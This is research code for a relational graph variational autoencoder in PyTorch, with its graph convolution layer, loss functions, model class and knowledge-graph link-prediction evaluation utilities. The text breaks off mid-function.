model = GCVAE(n*2, n_r, n_e).to(device)
if model_path:
model.load_state_dict(torch.load(model_path, map_location=torch.device(device)))
print('Saved model loaded.')
lp_results = link_prediction(model, testsub, truedict, batch_size)
outfile_path = 'data/'+dataset+'/lp_results_{}_{}.txt'.format(model.name, date.today().strftime("%Y%m%d"))
with open(outfile_path, 'w') as outfile:
json.dump(lp_results, outfile)
```
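For reference, the reported metrics are the mean reciprocal rank and the hits@k proportions over all test queries (head and tail corruptions), consistent with the checks in utiltests.py above:
```latex
\mathrm{MRR} = \frac{1}{|Q|} \sum_{i=1}^{|Q|} \frac{1}{\mathrm{rank}_i},
\qquad
\mathrm{hits@}k = \frac{1}{|Q|} \sum_{i=1}^{|Q|} \mathbb{1}\left[\mathrm{rank}_i \le k\right]
```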
#### File: torch_rgvae/layers/RGC_layers.py
```python
from utils.utils import block_diag, drop_edges, stack_matrices, sum_sparse  # drop_edges is used in forward()
from torch.nn.modules.module import Module
from torch.nn.parameter import Parameter
from torch import nn
import math
import torch
class RelationalGraphConvolution(Module):
""" Relational Graph Convolution (RGC) Layer (as described in https://arxiv.org/abs/1703.06103)"""
def __init__(self,
triples=None,
num_nodes=None,
num_relations=None,
in_features=None,
out_features=None,
edge_dropout=None,
edge_dropout_self_loop=None,
bias=True,
decomposition=None,
vertical_stacking=False,
reset_mode='xavier'):
super(RelationalGraphConvolution, self).__init__()
assert (triples is not None or num_nodes is not None or num_relations is not None or out_features is not None), \
"The following must be specified: triples, number of nodes, number of relations and output dimension!"
# If featureless, use number of nodes instead as input dimension
in_dim = in_features if in_features is not None else num_nodes
out_dim = out_features
# Unpack arguments
weight_decomp = decomposition['type'] if decomposition is not None and 'type' in decomposition else None
num_bases = decomposition['num_bases'] if decomposition is not None and 'num_bases' in decomposition else None
num_blocks = decomposition['num_blocks'] if decomposition is not None and 'num_blocks' in decomposition else None
self.triples = triples
self.num_nodes = num_nodes
self.num_relations = num_relations
self.in_features = in_features
self.out_features = out_features
self.weight_decomp = weight_decomp
self.num_bases = num_bases
self.num_blocks = num_blocks
self.vertical_stacking = vertical_stacking
self.edge_dropout = edge_dropout
self.edge_dropout_self_loop = edge_dropout_self_loop
# Instantiate weights
if self.weight_decomp is None:
self.weights = Parameter(torch.FloatTensor(num_relations, in_dim, out_dim))
elif self.weight_decomp == 'basis':
# Weight Regularisation through Basis Decomposition
assert num_bases > 0, \
'Number of bases should be set to higher than zero for basis decomposition!'
self.bases = Parameter(torch.FloatTensor(num_bases, in_dim, out_dim))
self.comps = Parameter(torch.FloatTensor(num_relations, num_bases))
elif self.weight_decomp == 'block':
# Weight Regularisation through Block Diagonal Decomposition
assert self.num_blocks > 0, \
'Number of blocks should be set to a value higher than zero for block diagonal decomposition!'
assert in_dim % self.num_blocks == 0 and out_dim % self.num_blocks == 0,\
f'For block diagonal decomposition, input dimensions ({in_dim}, {out_dim}) must be divisible ' \
f'by number of blocks ({self.num_blocks})'
self.blocks = nn.Parameter(
torch.FloatTensor(num_relations, self.num_blocks, in_dim // self.num_blocks, out_dim // self.num_blocks))
else:
raise NotImplementedError(f'{self.weight_decomp} decomposition has not been implemented')
# Instantiate biases
if bias:
self.bias = Parameter(torch.FloatTensor(out_features))
else:
self.register_parameter('bias', None)
self.reset_parameters(reset_mode)
def reset_parameters(self, reset_mode='xavier'):
""" Initialise biases and weights (xavier or uniform) """
if reset_mode == 'xavier':
if self.weight_decomp == 'block':
nn.init.xavier_uniform_(self.blocks, gain=nn.init.calculate_gain('relu'))
elif self.weight_decomp == 'basis':
nn.init.xavier_uniform_(self.bases, gain=nn.init.calculate_gain('relu'))
nn.init.xavier_uniform_(self.comps, gain=nn.init.calculate_gain('relu'))
else:
nn.init.xavier_uniform_(self.weights, gain=nn.init.calculate_gain('relu'))
if self.bias is not None:
torch.nn.init.zeros_(self.bias)
elif reset_mode == 'uniform':
stdv = 1.0 / math.sqrt(self.weights.size(1))
if self.weight_decomp == 'block':
self.blocks.data.uniform_(-stdv, stdv)
elif self.weight_decomp == 'basis':
self.bases.data.uniform_(-stdv, stdv)
self.comps.data.uniform_(-stdv, stdv)
else:
self.weights.data.uniform_(-stdv, stdv)
if self.bias is not None:
self.bias.data.uniform_(-stdv, stdv)
else:
raise NotImplementedError(f'{reset_mode} parameter initialisation method has not been implemented')
def forward(self, triples, features=None):
""" Perform a single pass of message propagation """
assert (features is None) == (self.in_features is None), \
"Layer has not been properly configured to take in features!"
in_dim = self.in_features if self.in_features is not None else self.num_nodes
# triples = self.triples
out_dim = self.out_features
edge_dropout = self.edge_dropout
weight_decomp = self.weight_decomp
num_nodes = self.num_nodes
num_relations = self.num_relations
vertical_stacking = self.vertical_stacking
# Apply edge dropout
if edge_dropout is not None and self.training:
assert 'general' in edge_dropout and 'self_loop' in edge_dropout, \
'General and self-loop edge dropouts must be specified!'
assert type(edge_dropout['general']) is float and 0.0 <= edge_dropout['general'] <= 1.0, \
"Edge dropout rates must between 0.0 and 1.0!"
general_edo = edge_dropout['general']
self_loop_edo = edge_dropout['self_loop']
triples = drop_edges(triples, num_nodes, general_edo, self_loop_edo)
# Choose weights
if weight_decomp is None:
weights = self.weights
elif weight_decomp == 'basis':
weights = torch.einsum('rb, bio -> rio', self.comps, self.bases)
elif weight_decomp == 'block':
weights = block_diag(self.blocks)
else:
raise NotImplementedError(f'{weight_decomp} decomposition has not been implemented')
# Determine whether to use cuda or not
if weights.is_cuda:
device = 'cuda'
else:
device = 'cpu'
# Stack adjacency matrices (vertically/horizontally)
adj_indices, adj_size = stack_matrices(
triples,
num_nodes,
num_relations,
vertical_stacking=vertical_stacking,
device=device
)
num_triples = adj_indices.size(0)
vals = torch.ones(num_triples, dtype=torch.float, device=device)
# Apply normalisation (vertical-stacking -> row-wise sum & horizontal-stacking -> column-wise sum)
sums = sum_sparse(adj_indices, vals, adj_size, row_normalisation=vertical_stacking, device=device)
if not vertical_stacking:
# Rearrange column-wise normalised value to reflect original order (because of transpose-trick)
n = (len(vals) - num_nodes) // 2
sums = torch.cat([sums[n:2 * n], sums[:n], sums[2 * n:]], dim=0)
vals = vals / sums
# Construct adjacency matrix
if device == 'cuda':
adj = torch.cuda.sparse.FloatTensor(indices=adj_indices.t(), values=vals, size=adj_size)
else:
adj = torch.sparse.FloatTensor(indices=adj_indices.t(), values=vals, size=adj_size)
assert weights.size() == (num_relations, in_dim, out_dim)
if self.in_features is None:
# Featureless
output = torch.mm(adj, weights.view(num_relations * in_dim, out_dim))
elif self.vertical_stacking:
# Adjacency matrix vertically stacked
af = torch.spmm(adj, features)
af = af.view(self.num_relations, self.num_nodes, in_dim)
output = torch.einsum('rio, rni -> no', weights, af)
else:
# Adjacency matrix horizontally stacked
fw = torch.einsum('ni, rio -> rno', features, weights).contiguous()
output = torch.mm(adj, fw.view(self.num_relations * self.num_nodes, out_dim))
assert output.size() == (self.num_nodes, out_dim)
if self.bias is not None:
output = torch.add(output, self.bias)
return output
```
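As a standalone illustration of the basis decomposition used above, each relation's weight matrix is a learned mixture of shared bases (all sizes below are made up):
```python
import torch

num_relations, num_bases, in_dim, out_dim = 4, 2, 8, 16
bases = torch.randn(num_bases, in_dim, out_dim)
comps = torch.randn(num_relations, num_bases)
weights = torch.einsum('rb, bio -> rio', comps, bases)  # W_r = sum_b comps[r, b] * bases[b]
assert weights.shape == (num_relations, in_dim, out_dim)
```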
#### File: rgvae/torch_rgvae/losses.py
```python
from graph_matching.MPGM import MPGM
from utils.utils import *
import wandb, torch
import torch.nn as nn
def graph_CEloss(target, prediction, softmax_E: bool=True, l_A=1., l_E=1., l_F=1.):
"""
Cross entropy loss function for the predicted graph. The loss for each matrix is computed separately.
Args:
target: list of the 3 target matrices A, E, F.
prediction: list of the 3 predicted matrices A_hat, E_hat, F_hat.
l_A: weight for BCE of A
l_E: weight for BCE or CE of E
l_F: weight for CE of F
softmax_E: use CE for E
"""
# Cast target vectors to tensors.
A, E, F = target
A_hat, E_hat, F_hat = prediction
# Define loss function
bce = torch.nn.BCELoss()
cce = torch.nn.CrossEntropyLoss()
sigmoid = nn.Sigmoid()
if softmax_E:
log_p_E = l_E*cce(E_hat.permute(0,3,1,2), torch.argmax(E, -1, keepdim=False))
else:
log_p_E = l_E*bce(sigmoid(E_hat), E)
log_p_A = l_A*bce(sigmoid(A_hat), A)
log_p_F = l_F*cce(F_hat.permute(0,2,1), torch.argmax(F, -1, keepdim=False))
# Weight and add loss
log_p = - log_p_A - log_p_E - log_p_F
x_permute = torch.ones_like(A) # Just a placeholder
wandb.log({"recon_loss_mean": log_p.detach().cpu().numpy(), "recon_loss_A_mean": log_p_A.detach().cpu().numpy(),
"recon_loss_E_mean": log_p_E.detach().cpu().numpy(), "recon_loss_F_mean": log_p_F.detach().cpu().numpy()})
return log_p, x_permute
def mpgm_loss(target, prediction, l_A=1., l_E=1., l_F=1., zero_diag: bool=False, softmax_E: bool=True):
"""
Modification of the loss function described in the GraphVAE paper.
The difference is, we treat A and E the same as both are sigmoided and F stays as it is softmaxed.
This way we can have multiple edge attributes.
The node attribute matrix is used to index the nodes, therefore the softmax.
Args:
target: list of the 3 target matrices A, E, F.
prediction: list of the 3 predicted matrices A_hat, E_hat, F_hat.
l_A: weight for BCE of A
l_E: weight for BCE of E
l_F: weight for BCE of F
zero_diag: if to zero out the diagonal in log_A term_3 and log_E.
"""
A, E, F = target
A_hat, E_hat, F_hat = prediction
bs = A.shape[0]
n = A.shape[1]
k = A_hat.shape[1]
d_e = E.shape[-1]
mpgm = MPGM()
sigmoid = nn.Sigmoid()
softmax = nn.Softmax(dim=-1)
A_hat = sigmoid(A_hat)
if softmax_E:
E_hat = softmax(E_hat)
else:
E_hat = sigmoid(E_hat)
F_hat = softmax(F_hat)
X = mpgm.call(A, A_hat.detach(), E, E_hat.detach(), F, F_hat.detach())
# This is the loss part from the paper:
A_t = torch.transpose(X, 2, 1) @ A @ X # shape (bs,k,k)
E_t = torch_batch_dot_v2(torch_batch_dot_v2(X, E, 1, 1, [bs,n,k,d_e]), X, -2, 1, [bs,k,k,d_e]) # target shape is (bs,k,k,d_e)
E_hat_t = torch_batch_dot_v2(torch_batch_dot_v2(X, E_hat, -1, 1, [bs,n,k,d_e]), X, -2, 1, [bs,n,n,d_e])
F_hat_t = torch.matmul(X, F_hat)
term_1 = (1/k) * torch.sum(torch.diagonal(A_t, dim1=-2, dim2=-1) * torch.log(torch.diagonal(A_hat, dim1=-2, dim2=-1)), -1, keepdim=True)
A_t_diag = torch.diagonal(A_t, dim1=-2, dim2=-1)
A_hat_diag = torch.diagonal(A_hat, dim1=-2, dim2=-1)
term_2 = (1/k) * torch.sum((torch.ones_like(A_t_diag) - A_t_diag) * torch.log((torch.ones_like(A_hat_diag) - A_hat_diag)), -1, keepdim=True)
"""
Thought: let's compare with vs. without zeroing out the diagonal and see what happens.
"""
# log_p_A part. Split in multiple terms for clarity.
term_31 = A_t * torch.log(A_hat)
term_32 = (1. - A_t) * torch.log(1. - A_hat)
# Zero diagonal mask:
mask = torch.ones_like(term_32)
# The number of edges we are taking into account.
a_edges = k*k
if zero_diag:
ind = np.diag_indices(mask.shape[-1])
mask[:,ind[0], ind[1]] = 0
a_edges = (k*(k-1))
term_3 = (1/a_edges) * torch.sum((term_31 + term_32) * mask, [1,2]).unsqueeze(-1)
log_p_A = term_1 + term_2 + term_3
# log_p_F
log_p_F = (1/n) * torch.sum(torch.log(no_zero(torch.sum(F * F_hat_t, -1))), (-1)).unsqueeze(-1)
# log_p_E
if softmax_E:
log_p_E = ((1/(torch.norm(A, p=1, dim=[-2,-1]))) * torch.sum(torch.sum(torch.log(no_zero(E * E_hat_t)), -1) * mask, (-2,-1))).unsqueeze(-1)
else:
# I changed the factor to the number of edges (k*(k-1)); the -1 is for the zero diagonal.
k_zero = k
if zero_diag:
k_zero = k - 1
log_p_E = ((1/(k*(k_zero))) * torch.sum(torch.sum(E_t * torch.log(E_hat) + (1 - E_t) * torch.log(1 - E_hat), -1) * mask, (-2,-1))).unsqueeze(-1)
log_p = l_A * log_p_A + l_E * log_p_E + l_F * log_p_F
wandb.log({"recon_loss_mean": torch.mean(log_p).detach().cpu().numpy(), "recon_loss_A_mean": torch.mean(l_A * log_p_A).detach().cpu().numpy(),
"recon_loss_E_mean": torch.mean(l_E * log_p_E).detach().cpu().numpy(), "recon_loss_F_mean": torch.mean(l_F * log_p_F).detach().cpu().numpy(),
"recon_loss_std": torch.std(log_p).detach().cpu().numpy(), "recon_loss_A_std": torch.std(l_A * log_p_A).detach().cpu().numpy(),
"recon_loss_E_std": torch.std(l_E * log_p_E).detach().cpu().numpy(), "recon_loss_F_std": torch.std(l_F * log_p_F).detach().cpu().numpy(),})
return log_p, X
def kl_divergence(mean, logvar, raxis=1):
"""
KL divergence between N(mean,std) and the standard normal N(0,1).
Args:
mean: mean of a normal dist.
logvar: log variance (log(std**2)) of a normal dist.
Returns Kl divergence in batch shape.
"""
kl_term = 1/2 * torch.sum((logvar.exp() + mean.pow(2) - logvar - 1), dim=raxis)
wandb.log({"reg_loss_mean": torch.mean(kl_term).detach().cpu().numpy(), "reg_loss_std": torch.std(kl_term).detach().cpu().numpy()})
return kl_term.unsqueeze(-1)
```
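kl_divergence above is the closed form KL(N(mu, sigma^2) || N(0, 1)) = 1/2 * sum(exp(logvar) + mu^2 - logvar - 1); a quick numeric check with made-up values:
```python
import torch

mean = torch.tensor([[0.5, -1.0]])
logvar = torch.tensor([[0.0, 0.2]])
kl = 0.5 * torch.sum(logvar.exp() + mean.pow(2) - logvar - 1, dim=1)
# For mean = 0 and logvar = 0 (a standard normal) the term is exactly zero.
```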
#### File: rgvae/torch_rgvae/RGVAE.py
```python
import torch
import torch.nn as nn
from torch_rgvae.encoders import NodeClassifier
from torch_rgvae.GVAE import GVAE
from torch_rgvae.decoders import RMLP, sRMLP
class TorchRGVAE(GVAE):
def __init__(self, args, n_r: int, n_e: int, data, dataset_name: str):
"""
Graph Variational Auto Encoder
:param n : Number of nodes
:param n_e : Number of node attributes
:param n_r : Number of edge attributes
:param dataset_name : name of the dataset which the model will train on.
:param h_dim : Hidden dimension
:param z_dim : latent dimension
:param beta: for beta < 1, makes the model is a beta-VAE
:param softmax_E : use softmax for edge attributes
"""
super().__init__(args, n_r, n_e, dataset_name)
self.name = 'RGVAE'
self.n = n = args['n']
self.n_e = n_e
self.n_r = n_r
self.z_dim = z_dim = args['z_dim'] if 'z_dim' in args else 2
self.h_dim = h_dim = args['h_dim'] if 'h_dim' in args else 1024
beta = args['beta'] if 'beta' in args else 1.
self.delta = args['delta'] if 'delta' in args else 0.
self.beta = torch.tensor(beta)
self.softmax_E = args['softmax_E'] if 'softmax_E' in args else True
self.perm_inv = args['perm_inv'] if 'perm_inv' in args else True
self.adj_argmax = args['adj_argmax'] if 'adj_argmax' in args else True
self.clip_grad = args['clip_grad'] if 'clip_grad' in args else True
self.dataset_name = dataset_name
self.model_params = args
self.k = k = n # assumption n=k
self.encoder = NodeClassifier(triples=data,
nnodes=n_e,
nrel=n_r,
nfeat=None,
nhid=h_dim,
nlayers=1,
nclass=2*z_dim,
edge_dropout=None,
decomposition=None,)
self.decoder = sRMLP(k, 1+n_r, h_dim, self.z_dim)
# Need to init?
for m in self.modules():
if isinstance(m, nn.Linear):
nn.init.xavier_uniform_(m.weight, gain=0.01)
def encode(self, triples):
"""
The encoder predicts a mean and logarithm of std of the prior distribution for the decoder.
A simple MLP decoder with a RGCN encoder.
"""
assert len(triples) == self.n
x = self.encoder(triples)
mean, logvar = torch.split(x, self.z_dim, dim=1)
return mean, logvar
def decode(self, z):
# new decoder: 15000,2 --> k,15000,15000*400
self.z = z
pred = self.decoder(z).view(self.k, -1)
return self.reconstruct(pred)
def reconstruct(self, pred):
"""
Reconstructs and returns the graph matrices from the flat prediction vector.
Args:
prediction: the predicted output of the decoder.
"""
idx2, idx1 = torch.split(pred, self.n_e*self.n_r, dim=1)
idx1 = torch.argmax(idx1, dim=-1)
idx2 = torch.argmax(idx2.view(self.k, self.n_e, -1).sum(-1), dim=-1)
idxr = torch.floor(idx2/self.n_e)
idx2 = idx2 - idxr*self.n_e
return torch.cat([idx1.unsqueeze(-1),idxr.unsqueeze(-1),idx2.unsqueeze(-1)], dim=-1)
if __name__ == "__main__":
pass
```
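The floor/subtract pair in reconstruct() is integer divmod over the flattened (relation, entity) grid; illustrative values only:
```python
import torch

n_e = 5                             # entities per relation row (made-up size)
flat = torch.tensor([0., 7., 14.])  # argmax indices into an n_r * n_e grid
rel = torch.floor(flat / n_e)       # -> [0., 1., 2.]
obj = flat - rel * n_e              # -> [0., 2., 4.]
```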
#### File: rgvae/utils/lp_utils.py
```python
import gzip, os, pickle, tqdm
import torch
import numpy as np
import pandas as pd
import random
import sys, time
from torch.autograd import Variable
import torch.nn.functional as F
from collections.abc import Iterable
from torch import nn
import re
import wandb
def locate_file(filepath):
directory = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
return directory + '/' + filepath
def load_strings(file):
""" Read triples from file """
with open(file, 'r') as f:
return [line.split() for line in f]
def load_link_prediction_data(name, use_test_set=False, limit=None):
"""
Load knowledge graphs for the link prediction experiment.
Source: https://github.com/pbloem/gated-rgcn/blob/1bde7f28af8028f468349b2d760c17d5c908b58b/kgmodels/data.py#L218
:param name: Dataset name ('fb15k', 'fb15k-237', 'wn18' or 'wn18rr')
:param use_test_set: If true, load the canonical test set, otherwise load the validation set from file.
:param limit: If set, only the first n triples are used.
:return: Link prediction test and train sets:
- train: list of edges [subject, predicate, object]
- test: list of edges [subject, predicate, object]
- all_triples: set of tuples (subject, predicate, object)
"""
if name.lower() == 'fb15k':
train_file = locate_file('data/fb15k/train.txt')
val_file = locate_file('data/fb15k/valid.txt')
test_file = locate_file('data/fb15k/test.txt')
elif name.lower() == 'fb15k-237':
train_file = locate_file('data/fB15k-237/train.txt')
val_file = locate_file('data/fB15k-237/valid.txt')
test_file = locate_file('data/fB15k-237/test.txt')
elif name.lower() == 'wn18':
train_file = locate_file('data/wn18/train.txt')
val_file = locate_file('data/wn18/valid.txt')
test_file = locate_file('data/wn18/test.txt')
elif name.lower() == 'wn18rr':
train_file = locate_file('data/wn18rr/train.txt')
val_file = locate_file('data/wn18rr/valid.txt')
test_file = locate_file('data/wn18rr/test.txt')
else:
raise ValueError(f'Could not find \'{name}\' dataset')
train = load_strings(train_file)
val = load_strings(val_file)
test = load_strings(test_file)
if use_test_set:
train = train + val
else:
test = val
if limit:
train = train[:limit]
test = test[:limit]
# Mappings for nodes (n) and relations (r)
nodes, rels = set(), set()
for i in train + val + test:
if len(i) < 3:
print(i)
for s, p, o in train + test:
nodes.add(s)
rels.add(p)
nodes.add(o)
i2n, i2r = list(nodes), list(rels)
n2i, r2i = {n: i for i, n in enumerate(nodes)}, {r: i for i, r in enumerate(rels)}
all_triples = set()
for s, p, o in train + test:
all_triples.add((n2i[s], r2i[p], n2i[o]))
train = [[n2i[st[0]], r2i[st[1]], n2i[st[2]]] for st in train]
test = [[n2i[st[0]], r2i[st[1]], n2i[st[2]]] for st in test]
return (n2i, i2n), (r2i, i2r), train, test, all_triples
def triple2matrix(triples, max_n: int, max_r: int):
"""
Transforms triples into matrix form.
Params:
triples: set of sparse triples
max_n: total count of nodes
max_r: total count of relations
Outputs the A, E, F matrices for the input triples.
"""
# An exception for single triples.
triples = triples.detach().cpu().numpy()
n_list = list(dict.fromkeys([triple[0] for triple in triples]))+list(dict.fromkeys([triple[2] for triple in triples]))
n_dict = dict(zip(n_list, np.arange(len(n_list))))
n = 2*len(triples) # All matrices must be of same size
# The empty first dimension is for stacking into batches.
A = torch.zeros((1,n,n), device=d())
E = torch.zeros((1,n,n,max_r), device=d())
F = torch.zeros((1,n,max_n), device=d())
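# Illustrative shapes (made-up sizes): for two input triples n = 4, giving
# A of shape (1, 4, 4), E of shape (1, 4, 4, max_r) and F of shape
# (1, 4, max_n), each one-hot along its trailing dimension.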
for (s, r, o) in triples:
i_s, i_o = n_dict[s], n_dict[o]
A[0,i_s,i_o] = 1
E[0,i_s,i_o,r] = 1
F[0,i_s,s] = 1
F[0,i_o,o] = 1
return (A, E, F)
def matrix2triple(graph):
"""
Converts a sparse graph back to triple form.
Args:
graph: Graph consisting of A, E, F matrix
returns a set of triples/one triple.
"""
A, E, F = graph
a = A.squeeze().detach().cpu().numpy()
e = E.squeeze().detach().cpu().numpy()
f = F.squeeze().detach().cpu().numpy()
s, o = np.where(a != 0)
triples = list()
for i in range(len(s)):
if len(e.shape) == 2:
r = e[s[i],o[i]]
else:
cho = np.where(e[s[i],o[i],:] == 1)[0]
if cho.size > 0:
r = np.array(np.random.choice(cho[0]))
else:
print('No attribute prediction for node {},{}. Graph inconsistent!'.format(s[i],o[i]))
break
if r.size > 0:
triple = (f[s[i]], r, f[o[i]])
triples.append(triple)
return triples
def translate_triple(triples, i2n, i2r, entity_dict=None):
"""
Translate an indexed triple back to text.
Args:
....
"""
triples_text = list()
for triple in triples:
(s,r,o) = triple
if entity_dict is None:
triples_text.append((i2n[s], i2r[r], i2n[o]))
else:
triples_text.append((entity_dict[i2n[s]][0], i2r[r], entity_dict[i2n[o]][0]))
return triples_text
def batch_t2m(batch, n: int, n_e: int, n_r: int):
"""
Converts batches of triples into matrix form.
:param batch: batch of triples
:param n: number of triples per. matrix
:param n_e: total node count.
:param n_r: total edge attribute count.
:return: the batched matrices A, E, F.
"""
# This condition is needed for batch size = 1.
if len(batch.shape) > 1:
bs = batch.shape[0]
else:
bs = 1
batch = batch.unsqueeze(0)
batch_a = list()
batch_e = list()
batch_f = list()
for ii in range(bs):
(A, E, F) = triple2matrix(batch[ii:ii+n,:], n_e, n_r) # TODO adopt this to bigger n
assert A.shape[1] != 1
batch_a.append(A)
batch_e.append(E)
batch_f.append(F)
return [torch.cat(batch_a, dim=0),torch.cat(batch_e, dim=0),torch.cat(batch_f, dim=0)]
###################### For actual link prediction ###########################
tics = []
def prt(verbose, *args, **kwargs):
if verbose:
print(*args, **kwargs)
def filter(rawtriples, all, true):
filtered = []
for triple in rawtriples:
if triple == true or not triple in all:
filtered.append(triple)
return filtered
def filter_scores_(scores, batch, truedicts, head=True):
"""
Filters a score matrix by setting the scores of known non-target true triples to -inf
    :param scores: [batch, num_candidates] score matrix
    :param batch: batch of target triples
    :param truedicts: (heads, tails) dictionaries of known completions
    :param head: if True, filter head predictions; otherwise tail predictions
    :return:
"""
indices = [] # indices of triples whose scores should be set to -infty
heads, tails = truedicts
for i, (s, p, o) in enumerate(batch):
s, p, o = triple = (s.item(), p.item(), o.item())
if head:
indices.extend([(i, si) for si in heads[p, o] if si != s])
else:
indices.extend([(i, oi) for oi in tails[s, p] if oi != o])
    #-- We add the indices of all known triples except the one corresponding to the target triple.
indices = torch.tensor(indices, device=d())
if indices.shape[0] != 0:
scores[indices[:, 0], indices[:, 1]] = float('-inf')
def truedicts(all):
"""
    Generates a pair of dictionaries containing all true tail and head completions.
:param all: A list of 3-tuples containing all known true triples
:return:
"""
heads, tails = {(p, o) : [] for _, p, o in all}, {(s, p) : [] for s, p, _ in all}
for s, p, o in all:
heads[p, o].append(s)
tails[s, p].append(o)
return heads, tails
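# --- Added illustration (editor's sketch): for three known triples, heads maps
# each (relation, object) pair to all valid subjects and tails maps each
# (subject, relation) pair to all valid objects.
def _demo_truedicts():
    known = [(0, 0, 1), (2, 0, 1), (0, 0, 3)]
    heads, tails = truedicts(known)
    assert heads[(0, 1)] == [0, 2]  # subjects completing (r=0, o=1)
    assert tails[(0, 0)] == [1, 3]  # objects completing (s=0, r=0)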
def eval(model : nn.Module, valset, truedicts, n, r, batch_size=16, hitsat=[1, 3, 10], filter_candidates=True, verbose=False, elbo=True):
"""
Evaluates a triple scoring model. Does the sorting in a single, GPU-accelerated operation.
    :param model: triple scoring model
    :param valset: validation triples
    :param truedicts: (heads, tails) dictionaries of known completions
    :param filter_candidates: if True, filter out known true triples that are not the target
    :param elbo: if True, use the full ELBO as the score; otherwise just the reconstruction loss
:return:
"""
    # Plain range does not accept tqdm kwargs, so swallow them when not verbose.
    rng = tqdm.trange if verbose else (lambda *args, **kwargs: range(*args))
heads, tails = truedicts
tforward = tfilter = tsort = 0.0
tic()
ranks = []
# head = False # TODO change this back later to do both head tail
for head in tqdm.tqdm([True, False], desc='LP Head, Tail', leave=True): # head or tail prediction
for fr in rng(0, valset.shape[0], batch_size, desc='Validation Set', leave=True):
to = min(fr + batch_size, valset.shape[0])
wandb.log({'batch': fr, 'set_size': valset.shape[0], 'head': 1 if head else 0})
batch = valset[fr:to, :].to(device=d())
bn, _ = batch.size()
# compute the full score matrix (filter later)
bases = batch[:, 1:] if head else batch[:, :2]
targets = batch[:, 0] if head else batch[:, 2]
# collect the triples for which to compute scores
bexp = bases.view(bn, 1, 2).expand(bn, n, 2)
ar = torch.arange(n, device=d()).view(1, n, 1).expand(bn, n, 1)
toscore = torch.cat([ar, bexp] if head else [bexp, ar], dim=2)
assert toscore.size() == (bn, n, 3)
tic()
scores = list()
for ii in rng(0, bn, 1, desc='Valset Batch', leave=False):
batch_scores = list()
for iii in rng(0, n, batch_size, desc='Batch of Batch', leave=False):
tt = min(iii + batch_size, toscore.shape[1])
tpg = model.n -1 # number of triples per graph
sub_batch = batch_t2m(toscore[ii, iii:tt, :].squeeze(), tpg, n, r)
if elbo:
loss = - model.elbo(sub_batch)
else:
prediction = model.forward(sub_batch)
loss = model.reconstruction_loss(sub_batch, prediction)
batch_scores.append(loss)
scores.append(torch.cat(batch_scores, dim=0).unsqueeze(0))
scores = torch.cat(scores, dim=0).squeeze()
tforward += toc()
assert scores.size() == (bn, n)
# filter out the true triples that aren't the target
tic()
filter_scores_(scores, batch, truedicts, head=head)
tfilter += toc()
            # Select the true scores, and count the number of scores larger than them
true_scores = scores[torch.arange(bn, device=d()), targets]
raw_ranks = torch.sum(scores > true_scores.view(bn, 1), dim=1, dtype=torch.long)
# -- This is the "optimistic" rank (assuming it's sorted to the front of the ties)
num_ties = torch.sum(scores == true_scores.view(bn, 1), dim=1, dtype=torch.long)
# Account for ties (put the true example halfway down the ties)
branks = raw_ranks + (num_ties - 1) // 2
ranks.extend((branks + 1).tolist())
hits_temp = []
for k in hitsat:
hits_temp.append(sum([1.0 if rank <= k else 0.0 for rank in ranks]) / len(ranks))
wandb.log({'MRR_temp': sum([1.0/rank for rank in ranks])/len(ranks),
'Hits_1_temp': hits_temp[0], 'Hits_3_temp': hits_temp[1], 'Hits_10_temp': hits_temp[2],
'test_set': fr, 'head': 1 if head else 0})
mrr = sum([1.0/rank for rank in ranks])/len(ranks)
hits = []
for k in hitsat:
hits.append(sum([1.0 if rank <= k else 0.0 for rank in ranks]) / len(ranks))
# if verbose:
# print(f'time {toc():.4}s total, {tforward:.4}s forward, {tfilter:.4}s filtering, {tsort:.4}s sorting.')
wandb.log({'MRR': mrr, 'Hits_1': hits[0], 'Hits_3': hits[1], 'Hits_10': hits[2]})
return mrr, tuple(hits), ranks
def tic():
tics.append(time.time())
def toc():
if len(tics)==0:
return None
else:
return time.time()-tics.pop()
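# --- Added usage note (editor's sketch): tic/toc form a stack-based timer, so
# nested measurements unwind in LIFO order.
def _demo_tictoc():
    tic()          # outer timer
    tic()          # inner timer
    inner = toc()  # seconds since the second tic()
    outer = toc()  # seconds since the first tic()
    assert outer >= inner >= 0.0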
def mask_(matrices, maskval=0.0, mask_diagonal=True):
"""
Masks out all values in the given batch of matrices where i <= j holds,
i < j if mask_diagonal is false
In place operation
:param tns:
:return:
"""
b, h, w = matrices.size()
indices = torch.triu_indices(h, w, offset=0 if mask_diagonal else 1)
matrices[:, indices[0], indices[1]] = maskval
def d(tensor=None):
"""
Returns a device string either for the best available device,
or for the device corresponding to the argument
:param tensor:
:return:
"""
if tensor is None:
return 'cuda' if torch.cuda.is_available() else 'cpu'
if type(tensor) == bool:
return 'cuda'if tensor else 'cpu'
return 'cuda' if tensor.is_cuda else 'cpu'
def here(subpath=None):
"""
:return: the path in which the package resides (the directory containing the 'kgmodels' dir)
"""
if subpath is None:
return os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))
return os.path.abspath(os.path.join(os.path.dirname(__file__), '../..', subpath))
def adj(edges, num_nodes, cuda=False, vertical=True):
"""
Computes a sparse adjacency matrix for the given graph (the adjacency matrices of all
relations are stacked vertically).
    :param edges: dictionary mapping relation id to (from, to) index lists
    :param num_nodes: total number of nodes
    :param cuda: place the index tensor on the GPU if True
    :return: sparse tensor indices and size
"""
ST = torch.cuda.sparse.FloatTensor if cuda else torch.sparse.FloatTensor
r, n = len(edges.keys()), num_nodes
size = (r*n, n) if vertical else (n, r*n)
from_indices = []
upto_indices = []
for rel, (fr, to) in edges.items():
offset = rel * n
if vertical:
fr = [offset + f for f in fr]
else:
to = [offset + t for t in to]
from_indices.extend(fr)
upto_indices.extend(to)
indices = torch.tensor([from_indices, upto_indices], dtype=torch.long, device=d(cuda))
assert indices.size(1) == sum([len(ed[0]) for _, ed in edges.items()])
assert indices[0, :].max() < size[0], f'{indices[0, :].max()}, {size}, {r}, {edges.keys()}'
assert indices[1, :].max() < size[1], f'{indices[1, :].max()}, {size}, {r}, {edges.keys()}'
return indices.t(), size
def adj_triples(triples, num_nodes, num_rels, cuda=False, vertical=True):
"""
Computes a sparse adjacency matrix for the given graph (the adjacency matrices of all
relations are stacked vertically).
    :param triples: list of (s, r, o) triples as tensors
    :param num_nodes: total number of nodes
    :param num_rels: total number of relations
    :return: sparse tensor indices and size
"""
r, n = num_rels, num_nodes
size = (r*n, n) if vertical else (n, r*n)
from_indices = []
upto_indices = []
for fr, rel, to in triples:
offset = rel.item() * n
if vertical:
fr = offset + fr.item()
else:
to = offset + to.item()
from_indices.append(fr)
upto_indices.append(to)
tic()
